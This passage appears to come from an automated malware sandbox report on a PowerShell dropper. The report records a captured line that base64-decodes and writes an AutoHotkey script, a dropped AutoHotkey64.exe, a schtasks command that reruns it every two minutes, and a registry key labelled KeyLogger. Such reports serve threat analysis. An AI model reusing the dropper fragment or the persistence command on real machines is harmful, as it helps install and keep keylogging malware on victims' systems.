Anti Malware Scan Interface: FromBase64String($arrComments[1]))[IO.File]::WriteAllText([IO.Path]::Combine($DocPath, "AutoHotkey64.ahk"), [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($arrComments[3])))

Source: C:\Users\Public\Documents\AutoHotkey64.exe

Code function: 19_2_0000000140008040 GetSystemDirectoryA,LoadLibraryA,GetProcAddress,FreeLibrary,LoadLibraryA,GetProcAddress,FreeLibrary,GetProcAddress,FreeLibrary,

19_2_0000000140008040

Source: AutoHotkey64.exe.0.dr

Static PE information: section name: text

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FFD9B893C47 push esp; retf	0_2_00007FFD9B893C48
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FFD9B8951AC push eax; retf	0_2_00007FFD9B8951A9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FFD9B89512D push eax; retf	0_2_00007FFD9B8951A9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FFD9B8B76A0 push ebp; ret	0_2_00007FFD9B8B7928
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 6_2_05DE7D60 pushfd ; iretd	6_2_05DE7D61
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 6_2_05DE7CA8 push esp; iretd	6_2_05DE7CA9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_025B6CF0 push eax; ret	11_2_025B6D6E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 11_2_025B6D61 push eax; ret	11_2_025B6D6E
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_00000001400DF2E0 push rbp; iretd	19_2_00000001400DF7D8

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\Public\Documents\AutoHotkey64.exe

Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /create /tn 3losh /tr C:\Users\Public\Documents\AutoHotkey64.exe /sc minute /mo 2 /st 04:23 /f

Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_00000001400A3FEC ShowWindow,IsIconic,GetParent,GetWindowLongW,GetWindowRect,MapWindowPoints,GetWindowLongW,IsWindowVisible,GetWindowLongW,GetMenu,GetWindowLongW,AdjustWindowRectEx,GetSystemMetrics,GetSystemMetrics,SendMessageW,GetClientRect,GetWindowRect,IsZoomed,ShowWindow,MoveWindow,GetForegroundWindow,DefDlgProcW,ShowWindow,GetAncestor,GetForegroundWindow,GetFocus,GetDlgCtrlID,GetParent,GetDlgCtrlID,UpdateWindow,	19_2_00000001400A3FEC
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_000000014009DFE7 GetDC,SelectObject,GetTextMetricsW,MulDiv,GetSystemMetrics,IsWindowVisible,IsIconic,GetPropW,MapWindowPoints,GetWindowLongW,SendMessageW,	19_2_000000014009DFE7
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_0000000140062000 GetForegroundWindow,IsIconic,GetWindowRect,ClientToScreen,GetSystemMetrics,GetSystemMetrics,wcsncpy,GetDC,DestroyIcon,DeleteObject,GetIconInfo,CreateCompatibleDC,DeleteObject,DeleteObject,CreateCompatibleDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,CreateCompatibleDC,free,ReleaseDC,DeleteObject,SelectObject,DeleteDC,DeleteObject,free,free,free,free,	19_2_0000000140062000
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_000000014009DFF6 GetDC,SelectObject,GetTextMetricsW,MulDiv,GetSystemMetrics,IsWindowVisible,IsIconic,GetPropW,MapWindowPoints,GetWindowLongW,SendMessageW,	19_2_000000014009DFF6
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_00000001400A404A ShowWindow,IsIconic,GetParent,GetWindowLongW,GetWindowRect,MapWindowPoints,GetWindowLongW,IsWindowVisible,GetWindowLongW,GetMenu,GetWindowLongW,AdjustWindowRectEx,GetSystemMetrics,GetSystemMetrics,SendMessageW,GetClientRect,GetWindowRect,IsZoomed,ShowWindow,MoveWindow,GetForegroundWindow,DefDlgProcW,ShowWindow,GetAncestor,GetForegroundWindow,GetFocus,GetDlgCtrlID,GetParent,GetDlgCtrlID,UpdateWindow,	19_2_00000001400A404A
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_00000001400A00B0 GetWindowLongW,GetWindowLongW,SetWindowPos,EnableWindow,GetWindowRect,GetClientRect,MulDiv,MulDiv,GetWindowRect,GetClientRect,MulDiv,MulDiv,_wcstoi64,IsWindow,SetParent,SetWindowLongPtrW,SetParent,IsWindowVisible,IsIconic,SetWindowLongW,SetWindowLongW,SetWindowPos,InvalidateRect,	19_2_00000001400A00B0
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_00000001400A40A8 ShowWindow,IsIconic,GetParent,GetWindowLongW,GetWindowRect,MapWindowPoints,GetWindowLongW,IsWindowVisible,GetWindowLongW,GetMenu,GetWindowLongW,AdjustWindowRectEx,GetSystemMetrics,GetSystemMetrics,SendMessageW,GetClientRect,GetWindowRect,IsZoomed,ShowWindow,MoveWindow,GetForegroundWindow,DefDlgProcW,ShowWindow,GetAncestor,GetForegroundWindow,GetFocus,GetDlgCtrlID,GetParent,GetDlgCtrlID,UpdateWindow,	19_2_00000001400A40A8
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_00000001400A40D9 MulDiv,MulDiv,ShowWindow,IsIconic,GetParent,GetWindowLongW,GetWindowRect,MapWindowPoints,GetWindowLongW,IsWindowVisible,GetWindowLongW,GetMenu,GetWindowLongW,AdjustWindowRectEx,GetSystemMetrics,GetSystemMetrics,SendMessageW,GetClientRect,GetWindowRect,IsZoomed,ShowWindow,MoveWindow,GetForegroundWindow,DefDlgProcW,ShowWindow,GetAncestor,GetForegroundWindow,GetFocus,GetDlgCtrlID,GetParent,GetDlgCtrlID,UpdateWindow,	19_2_00000001400A40D9
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_000000014009C110 realloc,SendMessageW,MulDiv,MulDiv,realloc,realloc,free,free,realloc,realloc,free,free,realloc,realloc,free,free,realloc,realloc,free,free,realloc,realloc,free,free,realloc,realloc,free,free,COMRefPtr,MulDiv,GetDC,SelectObject,GetTextMetricsW,MulDiv,GetDC,SelectObject,GetTextMetricsW,GetSystemMetrics,GetDC,SelectObject,GetTextMetricsW,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,DrawTextW,DrawTextW,GetCharABCWidthsW,MulDiv,GetSystemMetrics,GetSystemMetrics,MulDiv,GetDC,SelectObject,GetTextMetricsW,MulDiv,GetSystemMetrics,IsWindowVisible,IsIconic,GetPropW,MapWindowPoints,GetWindowLongW,SendMessageW,SelectObject,ReleaseDC,SendMessageW,SendMessageW,GetClientRect,SetWindowLongW,SendMessageW,SetWindowLongW,MoveWindow,GetWindowRect,SendMessageW,GetWindowRect,MapWindowPoints,InvalidateRect,SetWindowPos,SetWindowPos,MapWindowPoints,	19_2_000000014009C110
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_00000001400642E0 SendMessageW,IsWindowVisible,ShowWindow,IsIconic,ShowWindow,GetForegroundWindow,SetForegroundWindow,SendMessageW,	19_2_00000001400642E0
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_00000001400AA460 SendMessageW,GetWindowLongW,IsWindowVisible,IsIconic,GetFocus,GetWindowRect,GetPropW,ShowWindow,GetUpdateRect,SendMessageW,GetWindowLongW,ShowWindow,EnableWindow,GetWindowRect,PtInRect,PtInRect,SetFocus,SendMessageW,ShowWindow,SetFocus,InvalidateRect,MapWindowPoints,InvalidateRect,	19_2_00000001400AA460
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_00000001400BE5F0 GetForegroundWindow,IsWindowVisible,IsIconic,ShowWindow,	19_2_00000001400BE5F0
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_00000001400BE7C0 GetWindowThreadProcessId,GetForegroundWindow,IsIconic,ShowWindow,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,BringWindowToTop,	19_2_00000001400BE7C0
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_00000001400AE9D0 CheckMenuItem,CheckMenuItem,GetCursorPos,GetForegroundWindow,IsIconic,GetWindowRect,ClientToScreen,GetForegroundWindow,GetWindowThreadProcessId,SetForegroundWindow,SetForegroundWindow,TrackPopupMenuEx,PostMessageW,GetForegroundWindow,SetForegroundWindow,	19_2_00000001400AE9D0
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_00000001400BAA30 GetForegroundWindow,IsIconic,GetWindowRect,ClientToScreen,	19_2_00000001400BAA30
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_0000000140060A80 GetForegroundWindow,IsIconic,GetWindowRect,ClientToScreen,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,CreateCompatibleDC,_swprintf,free,ReleaseDC,SelectObject,DeleteDC,DeleteObject,free,free,GetPixel,ReleaseDC,free,free,	19_2_0000000140060A80
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_0000000140076B80 GetTickCount,GetForegroundWindow,GetTickCount,GetWindowThreadProcessId,GetGUIThreadInfo,ClientToScreen,GetForegroundWindow,IsIconic,GetWindowRect,ClientToScreen,_itow,	19_2_0000000140076B80
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_0000000140087330 GetForegroundWindow,IsIconic,GetWindowRect,ClientToScreen,CreateDCW,GetDC,GetPixel,DeleteDC,ReleaseDC,_swprintf,free,free,	19_2_0000000140087330
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_000000014005D972 IsZoomed,IsIconic,	19_2_000000014005D972
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_00000001400A3E60 SetWindowTextW,IsZoomed,IsIconic,ShowWindow,IsIconic,GetParent,GetWindowLongW,GetWindowRect,MapWindowPoints,GetWindowLongW,IsWindowVisible,GetWindowLongW,GetMenu,GetWindowLongW,AdjustWindowRectEx,GetSystemMetrics,GetSystemMetrics,SendMessageW,GetClientRect,GetWindowLongW,GetWindowRect,GetClientRect,SystemParametersInfoW,GetWindowRect,IsZoomed,ShowWindow,MoveWindow,GetForegroundWindow,DefDlgProcW,ShowWindow,GetAncestor,GetForegroundWindow,GetFocus,GetDlgCtrlID,GetParent,GetDlgCtrlID,UpdateWindow,SetFocus,	19_2_00000001400A3E60
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_00000001400A3E60 SetWindowTextW,IsZoomed,IsIconic,ShowWindow,IsIconic,GetParent,GetWindowLongW,GetWindowRect,MapWindowPoints,GetWindowLongW,IsWindowVisible,GetWindowLongW,GetMenu,GetWindowLongW,AdjustWindowRectEx,GetSystemMetrics,GetSystemMetrics,SendMessageW,GetClientRect,GetWindowLongW,GetWindowRect,GetClientRect,SystemParametersInfoW,GetWindowRect,IsZoomed,ShowWindow,MoveWindow,GetForegroundWindow,DefDlgProcW,ShowWindow,GetAncestor,GetForegroundWindow,GetFocus,GetDlgCtrlID,GetParent,GetDlgCtrlID,UpdateWindow,SetFocus,	19_2_00000001400A3E60
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_000000014009DF4D GetDC,SelectObject,GetTextMetricsW,MulDiv,GetSystemMetrics,IsWindowVisible,IsIconic,GetPropW,MapWindowPoints,GetWindowLongW,SendMessageW,	19_2_000000014009DF4D
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_0000000140051F50 IsWindow,DestroyWindow,GetCursorPos,GetForegroundWindow,IsIconic,GetWindowRect,ClientToScreen,MonitorFromPoint,GetMonitorInfoW,IsWindow,CreateWindowExW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetWindowRect,SendMessageW,SendMessageW,	19_2_0000000140051F50
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_000000014009DF5D MulDiv,GetDC,SelectObject,GetTextMetricsW,MulDiv,GetSystemMetrics,IsWindowVisible,IsIconic,GetPropW,MapWindowPoints,GetWindowLongW,SendMessageW,	19_2_000000014009DF5D
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_000000014009DF55 GetDC,SelectObject,GetTextMetricsW,MulDiv,GetSystemMetrics,IsWindowVisible,IsIconic,GetPropW,MapWindowPoints,GetWindowLongW,SendMessageW,	19_2_000000014009DF55
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_000000014009DF6B MulDiv,GetDC,SelectObject,GetTextMetricsW,MulDiv,GetSystemMetrics,IsWindowVisible,IsIconic,GetPropW,MapWindowPoints,GetWindowLongW,SendMessageW,	19_2_000000014009DF6B
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_00000001400A3F8F ShowWindow,IsIconic,GetParent,GetWindowLongW,GetWindowRect,MapWindowPoints,GetWindowLongW,IsWindowVisible,GetWindowLongW,GetMenu,GetWindowLongW,AdjustWindowRectEx,GetSystemMetrics,GetSystemMetrics,SendMessageW,GetClientRect,GetWindowRect,IsZoomed,ShowWindow,MoveWindow,GetForegroundWindow,DefDlgProcW,ShowWindow,GetAncestor,GetForegroundWindow,GetFocus,GetDlgCtrlID,GetParent,GetDlgCtrlID,UpdateWindow,	19_2_00000001400A3F8F
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_0000000140065F90 GetCursorPos,GetForegroundWindow,IsIconic,GetWindowRect,ClientToScreen,WindowFromPoint,EnumChildWindows,GetClassNameW,EnumChildWindows,free,	19_2_0000000140065F90
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_00000001400A3F85 ShowWindow,IsIconic,GetParent,GetWindowLongW,GetWindowRect,MapWindowPoints,GetWindowLongW,IsWindowVisible,GetWindowLongW,GetMenu,GetWindowLongW,AdjustWindowRectEx,GetSystemMetrics,GetSystemMetrics,SendMessageW,GetClientRect,GetWindowRect,IsZoomed,ShowWindow,MoveWindow,GetForegroundWindow,DefDlgProcW,ShowWindow,GetAncestor,GetForegroundWindow,GetFocus,GetDlgCtrlID,GetParent,GetDlgCtrlID,UpdateWindow,	19_2_00000001400A3F85
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_000000014009DFAF MulDiv,GetDC,SelectObject,GetTextMetricsW,MulDiv,GetSystemMetrics,IsWindowVisible,IsIconic,GetPropW,MapWindowPoints,GetWindowLongW,SendMessageW,	19_2_000000014009DFAF
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Code function: 19_2_00000001400A3FBA ShowWindow,IsIconic,GetParent,GetWindowLongW,GetWindowRect,MapWindowPoints,GetWindowLongW,IsWindowVisible,GetWindowLongW,GetMenu,GetWindowLongW,AdjustWindowRectEx,GetSystemMetrics,GetSystemMetrics,SendMessageW,GetClientRect,GetWindowRect,IsZoomed,ShowWindow,MoveWindow,GetForegroundWindow,DefDlgProcW,ShowWindow,GetAncestor,GetForegroundWindow,GetFocus,GetDlgCtrlID,GetParent,GetDlgCtrlID,UpdateWindow,	19_2_00000001400A3FBA

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Key value created or modified: HKEY_CURRENT_USER\SOFTWARE\AppID KeyLogger

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Documents\AutoHotkey64.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
